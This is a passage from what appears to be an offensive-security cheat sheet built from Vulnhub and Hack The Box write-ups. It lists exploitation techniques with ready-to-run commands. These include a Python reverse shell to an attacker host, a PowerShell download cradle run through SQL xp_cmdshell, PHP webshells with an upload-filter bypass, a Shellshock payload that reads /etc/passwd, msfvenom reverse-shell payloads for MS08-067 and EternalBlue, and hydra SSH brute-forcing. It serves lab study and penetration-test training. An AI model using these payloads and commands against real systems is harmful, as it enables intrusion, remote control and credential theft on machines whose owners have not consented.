(#5)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf) | [vh#62](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png" width="100" height="100" /> | [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd) | [+] https://www.exploit-db.com/exploits/31173 [+] https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb --- <a name="exploit_pfsense"></a> #### exploit_pfsense [⇡](#exploit) pfsense 2.1.3 is vulnerable to command injection ```shell python3 43560.py --rhost <targetip> --lhost <attackerip> --lport <attackerport> --username foo --password bar ``` [+] https://www.exploit-db.com/exploits/43560 [+] https://medium.com/@ranakhalil101/hack-the-box-sense-writeup-w-o-metasploit-ef064f380190 --- <a name="exploit_php_acs_rfi"></a> #### exploit_php_acs_rfi [⇡](#exploit) Advanced Comment System 1.0 is vulnerable to remote file inclusion and command execution attacks ```shell curl -v "<targetip>/internal/advanced_comment_system/admin.php?ACS_path=php://input%00" -d "<?system('whoami');?>" ``` [+] https://www.exploit-db.com/exploits/9623 --- <a name="exploit_php_fileupload"></a> #### exploit_php_fileupload [⇡](#exploit) certain poorly developed php web applications allow unrestricted file uploads that can be abused to gain interactive access on the target system ```shell cp /usr/share/webshells/php/php-reverse-shell.php ./rs.php subl rs.php # point to <attackerip> and <attackerport> nc -nlvp <attackerport> # upload rs.php and trigger execution ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackme: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf) | [vh#330](https://www.vulnhub.com/entry/hackme-1,330/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 2. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | | 3. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | --- <a name="exploit_php_fileupload_bypass"></a> #### exploit_php_fileupload_bypass [⇡](#exploit) add gif file magicbytes `GIF891` to a php reverse shell file, rename it to rs.php.gif and upload to bypass upload filter. sometimes, a restrictve waf might still stop file upload. in that case, use a minimal command execution php file with gif magicbytes instead of a full php reverse shell ```shell cp /usr/share/webshells/php/php-reverse-shell.php ./rs.php.gif subl rs.php.gif # point to <attackerip> and <attackerport> AND add GIF89a to the start of file nc -nlvp <attackerport> # upload rs.php.gif and trigger execution ### echo -e 'GIF89a\n<?php $out=$_GET["cmd"]; echo `$out`; ?>' >cmd.gif # upload and execute commands ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [IMF: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/writeup.pdf) | [vh#162](https://www.vulnhub.com/entry/imf-1,162/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_bof`](https://github.com/7h3rAm/writeups#privesc_bof) | | 2. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | --- <a name="exploit_php_reverseshell"></a> #### exploit_php_reverseshell [⇡](#exploit) use php reverse shell code with an exploit to gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 2. | [Mr-Robot: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf) | [vh#151](https://www.vulnhub.com/entry/mr-robot-1,151/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png" width="100" height="100" /> | [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 3. | [hackme: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf) | [vh#330](https://www.vulnhub.com/entry/hackme-1,330/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 4. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | | 5. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | | 6. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="exploit_php_webshell"></a> #### exploit_php_webshell [⇡](#exploit) use the php web shell to execute arbitrary commands and gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100" /> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) | --- <a name="exploit_phptax"></a> #### exploit_phptax [⇡](#exploit) the `Phptax 0.8` web application is vulnerable to remote code execution ```shell GET /phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E HTTP/1.1 Host: <targetip>:<targetport> User-Agent: Mozilla/4.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0 GET /phptax/data/rce.php?cmd=uname%20-a HTTP/1.1 Host: <targetip>:<targetport> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: 2014 (#5)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf) | [vh#62](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png" width="100" height="100" /> | [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd) | [+] https://www.exploit-db.com/exploits/25849 --- <a name="exploit_prtg_sensors"></a> #### exploit_prtg_sensors [⇡](#exploit) execute a reverse shell command through prtg sensor creation dialog and play it to get interactive access on the target system ```shell ./46527.sh -u http://<targetip> -c "<prtg session cookie>" psexec.py [email protected] ``` [+] https://www.exploit-db.com/exploits/46527 [+] https://nvd.nist.gov/vuln/detail/CVE-2018-9276 [+] https://hipotermia.pw/htb/netmon [+] https://snowscan.io/htb-writeup-netmon/# --- <a name="exploit_psexec_login"></a> #### exploit_psexec_login [⇡](#exploit) If credentials for a non-administrative user are available, we can use `psexec.py` to connect and gain interactive access to the target system. ```shell psexec <username>@<targetip> ``` --- <a name="exploit_python_reverseshell"></a> #### exploit_python_reverseshell [⇡](#exploit) use a python reverse shell to gain interactive access on the target system ```shell nc -nlvp 9999 http://<targetip>/shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attackerip>",<attackerport>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf) | [htb#118](https://app.hackthebox.eu/machines/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) | | 2. | [Escalate_Linux: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf) | [vh#323](https://www.vulnhub.com/entry/escalate_linux-1,323/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png" width="100" height="100" /> | [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | [+] http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet [+] https://highon.coffee/blog/reverse-shell-cheat-sheet/#python-reverse-shell --- <a name="exploit_shellshock"></a> #### exploit_shellshock [⇡](#exploit) ```shell curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://<targetip>/cgi-bin/user.sh nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <targetip> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Shocker](https://github.com/7h3rAm/writeups/blob/master/htb.shocker/writeup.pdf) | [htb#108](https://app.hackthebox.eu/machines/108) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/killchain.png" width="100" height="100" /> | [`exploit_shellshock`](https://github.com/7h3rAm/writeups#exploit_shellshock), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | [+] https://zayotic.com/posts/oscp-reference/ [+] https://highon.coffee/blog/shellshock-pen-testers-lab-walkthrough/ [+] https://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation/ --- <a name="exploit_smb_ms08_067"></a> #### exploit_smb_ms08_067 [⇡](#exploit) (netapi exploit) for microsoft windows xp systems with open smb ports, use the [ms08-067](https://github.com/andyacer/ms08_067) metasploit module [`windows/smb/ms08_067_netapi`]() ```shell scan: nmap -v -p 139,445 --script=smb-check-vulns --script-args=unsafe=1 <targetip> msfcli auxiliary/scanner/smb/ms08_067_check rhosts=<targetip> threads=100 E manual_a: wget https://raw.githubusercontent.com/andyacer/ms08_067/master/ms08_067_2018.py msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows nc -nlvp <attackerport> python ms08_067_2018.py <targetip> <osid> <targetport> manual_b: searchsploit ms08-067 python /usr/share/exploitdb/platforms/windows/remote/7132.py <targetip> 1 msf: use exploit/windows/smb/ms08_067_netapi set RHOST <targetip> set LHOST <attackerip> show options exploit ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Legacy](https://github.com/7h3rAm/writeups/blob/master/htb.legacy/writeup.pdf) | [htb#2](https://app.hackthebox.eu/machines/2) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/killchain.png" width="100" height="100" /> | [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067) | [+] https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-067 [+] https://github.com/andyacer/ms08_067 [+] https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067.py [+] https://blog.rapid7.com/2014/02/03/new-ms08-067/ [+] https://0xdf.gitlab.io/2019/02/21/htb-legacy.html --- <a name="exploit_smb_ms17_010"></a> #### exploit_smb_ms17_010 [⇡](#exploit) (eternalblue exploit) for microsoft windows system with smb v1 enbaled, use the metasploit exploit `windows/smb/ms17_010_eternalblue` ```shell nmap -p 445 -script smb-check-vulns -script-args=unsafe=1 <targetip> manual: wget https://raw.githubusercontent.com/helviojunior/MS17-010/master/send_and_execute.py msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe nc -nlvp <attackerport> python send_and_execute.py <targetip> revshell.exe msf: use exploit/windows/smb/ms17_010_eternalblue set RHOST <targetip> set LHOST <attackerip> show options exploit ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Blue](https://github.com/7h3rAm/writeups/blob/master/htb.blue/writeup.pdf) | [htb#51](https://app.hackthebox.eu/machines/51) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/killchain.png" width="100" height="100" /> | [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010) | [+] https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010 [+] https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue [+] https://0xdf.gitlab.io/2019/02/21/htb-legacy.html [+] https://github.com/helviojunior/MS17-010/send_and_execute.py --- <a name="exploit_smb_nullsession"></a> #### exploit_smb_nullsession [⇡](#exploit) smb null sessions leak a lot of sensitive information about the target system. it could be useful to access open shares or to get sensitive information | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="exploit_smb_usermap"></a> #### exploit_smb_usermap [⇡](#exploit) samba 3.0.0 - 3.0.25rc3 is vulnerable to remote command execution ```shell nc -nlvp <attackerport> sudo apt install python python-pip pip install --user pysmb git clone https://github.com/amriunix/CVE-2007-2447.git cd CVE-2007-2447/ python usermap_script.py <targetip> 139 <attackerip> <attackerport> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lame](https://github.com/7h3rAm/writeups/blob/master/htb.lame/writeup.pdf) | [htb#1](https://app.hackthebox.eu/machines/1) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/killchain.png" width="100" height="100" /> | [`exploit_smb_usermap`](https://github.com/7h3rAm/writeups#exploit_smb_usermap) | [+] https://nvd.nist.gov/vuln/detail/CVE-2007-2447 [+] https://github.com/amriunix/CVE-2007-2447 --- <a name="exploit_smb_web_root"></a> #### exploit_smb_web_root [⇡](#exploit) smb shared directory is mapped to the web server's root directory. read files to obtain sensitive information or upload a reverse shell file native to the web server and trigger it's execution to gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="exploit_sql_login"></a> #### exploit_sql_login [⇡](#exploit) login to the target system using a sql service account ```shell mssqlclient.py -windows-auth "<username>@<targetip>" ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="exploit_sql_xpcmdshell"></a> #### exploit_sql_xpcmdshell [⇡](#exploit) use the SQL xp_cmdshell method to gain command execution on the target system ```shell SELECT IS_SRVROLEMEMBER('sysadmin') ## check if current sql user has db sysadmin role, continue if true EXEC sp_configure 'Show Advanced Options', 1; reconfigure; sp_configure; EXEC sp_configure 'xp_cmdshell', 1 reconfigure; xp_cmdshell "whoami" type shell.ps1 ## create a powershell reverse shell xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://<attackerip>/shell.ps1\");" python3 -m http.server 80 ## serve the reverse shell via http ufw allow from <targetip> proto tcp to any port 80,<attackerport> ## allow incoming connection from <targetip> nc -nlvp <attackerport> ## listen for incoming reverse shell connection ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="exploit_sqli"></a> #### exploit_sqli [⇡](#exploit) target system is running a webapp that's vulnerable to sql injection ```shell sqlmap -u "http://<targetip>:<targetport>/<vulnwebapp>/index.php" --batch --forms --dump ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [CronOS](https://github.com/7h3rAm/writeups/blob/master/htb.cronos/writeup.pdf) | [htb#11](https://app.hackthebox.eu/machines/11) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron) | | 2. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 3. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 4. | [Kioptrix: Level 1.1 (#2)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf) | [vh#23](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend) | --- <a name="exploit_ssh_authorizedkeys"></a> #### exploit_ssh_authorizedkeys [⇡](#exploit) if we have access to a user's `.ssh` directory, copy our `id_rsa.pub` file to `.ssh/authorized_keys` to obtain passwordless ssh access | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) | | 2. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) | --- <a name="exploit_ssh_bruteforce"></a> #### exploit_ssh_bruteforce [⇡](#exploit) use hydra to bruteforce ssh password for a know user ```shell hydra -l anne -P "/usr/share/wordlists/rockyou.txt" -e nsr -s 22 ssh://<targetip> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img 